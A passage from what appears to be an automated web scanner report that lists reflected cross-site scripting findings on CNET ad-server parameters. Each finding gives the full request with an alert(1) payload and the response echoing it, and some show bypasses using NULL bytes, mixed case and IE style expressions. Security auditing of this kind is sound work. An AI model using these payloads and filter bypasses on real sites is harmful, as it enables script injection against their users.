This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=1&NCAT=13270%3A31324%3A&PTYPE=2700&CID=466&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=1&NODE=31324&CNET-PAGE-GUID=gREAagoOYJUAABq2KccAAAEr&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81327508&ADREQ&beacon=18d81b<a>21414ae266b&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/apple-ipad/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:06:10 GMT
Server: Apache/2.2
Content-Length: 551
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:06:10 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=1&NCAT=13270%3A31324%3A&PTYPE=2700&CID=466&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=1&NODE=31324&CNET-PAGE-GUID=gREAagoOYJUAABq2KccAAAEr&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81327508&ADREQ&beacon=18d81b<a>21414ae266b&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='188121414266' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw19.cnet.com::138582
...[SNIP]...

3.619. http://mads.cnet.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d26"><script>alert(1)</script>b1b84bf4d41 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=25f7d26"><script>alert(1)</script>b1b84bf4d41&SITE=7&ADSTYLE=NOOVERGIF&_RGROUP=13054 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:01:25 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 22:01:25 GMT
Content-Length: 2550


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=13054&sg=441157&o=&h=cn&p=2&b=25f7d26"><script>alert(1)</script>b1b84bf4d41&l=en_US&site=7&pt=&nd=&pid=&cid=&pp=&e=&rqid=01phx1-ad-e18:4DB83440725E45&orh=admeld.com&oepartner=&epartner=&ppartner=&pdom=tag.admeld.com&
...[SNIP]...

3.620. http://mads.cnet.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60bc5"style%3d"x%3aexpression(alert(1))"8a9503ee2a9 was submitted in the BRAND parameter. This input was echoed as 60bc5"style="x:expression(alert(1))"8a9503ee2a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /mac-ad?CELT=ifc&BRAND=60bc5"style%3d"x%3aexpression(alert(1))"8a9503ee2a9&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13061 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf?t=1303946102032&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fnews.cnet.com%2F8301-30686_3-20057815-266.html%3Ftag%3DtopStories1&refer=http%3A%2F%2Fnews.cnet.com%2F%3Ftag%3Dhdr%3Bbrandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; cnet_rvpCallout=1; arrowTmUser=false; arrowLnUser=false; arrowHtcUser=false; wsFd=true; mad_rsi_segs=ASK05540_10066; arrowLrps=1303941361935; arrowLat=1303946085185; arrowSpc=3; arrowFdCounter=3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:18 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 23:16:18 GMT
Content-Length: 2515


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.cnet.com/mac-ad?&_RGROUP=13061&&CNET-BRAND-ID=60bc5"style="x:expression(alert(1))"8a9503ee2a9&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=3&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.04.27.19.16.18&SYS:RQID=00phx1-ad-e15:4DB87DC4298913&amp
...[SNIP]...

3.621. http://mads.cnet.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00992b9"><script>alert(1)</script>62b47c61ae6 was submitted in the BRAND parameter. This input was echoed as 992b9"><script>alert(1)</script>62b47c61ae6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /mac-ad?CELT=ifc&BRAND=%00992b9"><script>alert(1)</script>62b47c61ae6&SITE=7&ADSTYLE=NOOVERGIF&_RGROUP=13054 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:01:32 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 22:01:32 GMT
Content-Length: 2548


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.cnet.com/mac-ad?&_RGROUP=13054&&CNET-BRAND-ID=.992b9"><script>alert(1)</script>62b47c61ae6&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=7&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.04.27.18.01.32&SYS:RQID=01phx1-ad-e18:4DB83440726665&amp
...[SNIP]...

3.622. http://mads.cnet.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83827"><ScRiPt>alert(1)</ScRiPt>cd579167086 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /mac-ad?CELT=ifc&BRAND=83827"><ScRiPt>alert(1)</ScRiPt>cd579167086&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=19411 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/728x90/cnetnews_atf?t=1303946305005&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2F
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; arrowTmUser=false; cnet_rvpCallout=2; arrowLrps=1303941361935; arrowLat=1303946196991; arrowSpc=6; wsFd=true; arrowFdCounter=-1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:45 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 23:19:45 GMT
Content-Length: 2697


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.cnet.com/mac-ad?&_RGROUP=19411&&CNET-BRAND-ID=83827"><ScRiPt>alert(1)</ScRiPt>cd579167086&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=3&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.04.27.19.19.45&SYS:RQID=00phx1-ad-e20:4DB897F8CBB1F&
...[SNIP]...

3.623. http://mads.cnet.com/mac-ad [CELT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 147c7<a>2d1cf78dda5 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CELT=ifc147c7<a>2d1cf78dda5&BRAND=25&SITE=7&ADSTYLE=NOOVERGIF&_RGROUP=13054 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:00:22 GMT
Server: Apache/2.2
Content-Length: 390
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 22:00:22 GMT

<!-- MAC-AD STATUS: ; MAPPING UNEXPECTED CELT "ifc147c
...[SNIP]...

3.624. http://mads.cnet.com/mac-ad [OVERGIF parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the OVERGIF request parameter is copied into the HTML document as plain text between tags. The payload %00aad2c<script>alert(1)</script>203116cad76 was submitted in the OVERGIF parameter. This input was echoed as aad2c<script>alert(1)</script>203116cad76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /mac-ad?CELT=ifc&BRAND=3&SITE=8&OVERGIF=%3C%21--%20og%20in%20ad%20call%20--%3E%00aad2c<script>alert(1)</script>203116cad76&_RGROUP=13062 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://www35.glam.com/gad/glamadapt_psrv.act?;afid=1623101692;sz=728x90;ga_output=iframe;ga_shortclick=yes;ga_log=yes;tile=1;_g_cv=1;cachebust=2011.04.27.23.18.29
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; arrowTmUser=false; cnet_rvpCallout=2; arrowLrps=1303941361935; arrowLat=1303946196991; arrowSpc=6; wsFd=true; arrowFdCounter=-1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:20 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 23:20:20 GMT
Content-Length: 2164


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
.aad2c<script>alert(1)</script>203116cad76<a href="http://adlog.com.com/adlog/c/r=13062&sg=453433&o=&h=cn&p=2&b=3&l=en_US&site=8&pt=&nd=&pid=&cid=&pp=&e=&rqid=01phx1-ad-e20:4DB897D6D404A&
...[SNIP]...

3.625. http://mads.cnet.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c9b4'%3balert(1)//4d0b51e519a was submitted in the PAGESTATE parameter. This input was echoed as 9c9b4';alert(1)//4d0b51e519a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=9c9b4'%3balert(1)//4d0b51e519a&SITE=1&NCAT=13270%3A31324%3A&PTYPE=2700&CID=466&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=1&NODE=31324&CNET-PAGE-GUID=gREAagoOYJUAABq2KccAAAEr&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81327508&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/apple-ipad/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:01:56 GMT
Server: Apache/2.2
Content-Length: 235
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:01:56 GMT

/* MAC ad */;window.CBSI_PAGESTATE='9c9b4';alert(1)//4d0b51e519a';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw11.cnet.com::1648482624 2011.04.27.22.01.56 *//* MAC T 0.1.1.1 */

3.626. http://mads.cnet.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 4279b<a>5c7ae6d71d2 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=14279b<a>5c7ae6d71d2&NCAT=13270%3A31324%3A&PTYPE=2700&CID=466&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=1&NODE=31324&CNET-PAGE-GUID=gREAagoOYJUAABq2KccAAAEr&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81327508&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/apple-ipad/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:02:28 GMT
Server: Apache/2.2
Content-Length: 593
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:02:28 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=14279b<a>5c7ae6d71d2&NCAT=13270%3A31324%3A&PTYPE=2700&CID=466&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=1&NODE=31324&CNET-PAGE-GUID=gREAagoOYJUAABq2KccAAAEr&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81327508&ADREQ&beacon=1&coo
...[SNIP]...

3.627. http://mads.cnet.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0049149"><script>alert(1)</script>b33926a460d was submitted in the SITE parameter. This input was echoed as 49149"><script>alert(1)</script>b33926a460d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /mac-ad?CELT=ifc&BRAND=25&SITE=%0049149"><script>alert(1)</script>b33926a460d&ADSTYLE=NOOVERGIF&_RGROUP=13054 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:02:34 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 22:02:34 GMT
Content-Length: 2551


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.cnet.com/mac-ad?&_RGROUP=13054&&CNET-BRAND-ID=25&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=.49149"><script>alert(1)</script>b33926a460d&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.04.27.18.02.34&SYS:RQID=00phx1-ad-e15:4DB87DC41692C2&&REFER_HOST=tag.admeld.com&&&&&&a
...[SNIP]...

3.628. http://mads.cnet.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5938"><script>alert(1)</script>0d0bc95efb1 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=25&SITE=7a5938"><script>alert(1)</script>0d0bc95efb1&ADSTYLE=NOOVERGIF&_RGROUP=13054 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:02:21 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 22:02:21 GMT
Content-Length: 2550


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=13054&sg=441157&o=&h=cn&p=2&b=25&l=en_US&site=7a5938"><script>alert(1)</script>0d0bc95efb1&pt=&nd=&pid=&cid=&pp=&e=&rqid=00phx1-ad-e18:4DB825B484477A&orh=admeld.com&oepartner=&epartner=&ppartner=&pdom=tag.admeld.com&cpnmodule=&count=&a
...[SNIP]...

3.629. http://mads.cnet.com/mac-ad [_RGROUP parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the _RGROUP request parameter is copied into an HTML comment. The payload e86d9--><a>f7bb315bad7 was submitted in the _RGROUP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mac-ad?CELT=ifc&BRAND=25&SITE=7&ADSTYLE=NOOVERGIF&_RGROUP=13054e86d9--><a>f7bb315bad7 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:10 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 22:04:10 GMT
Content-Length: 1324


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a>f7bb315bad7" _REQ_NUM="0" -->
...[SNIP]...

3.630. http://mads.gamespot.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.gamespot.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload d166b<a>5876ce1eaec was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

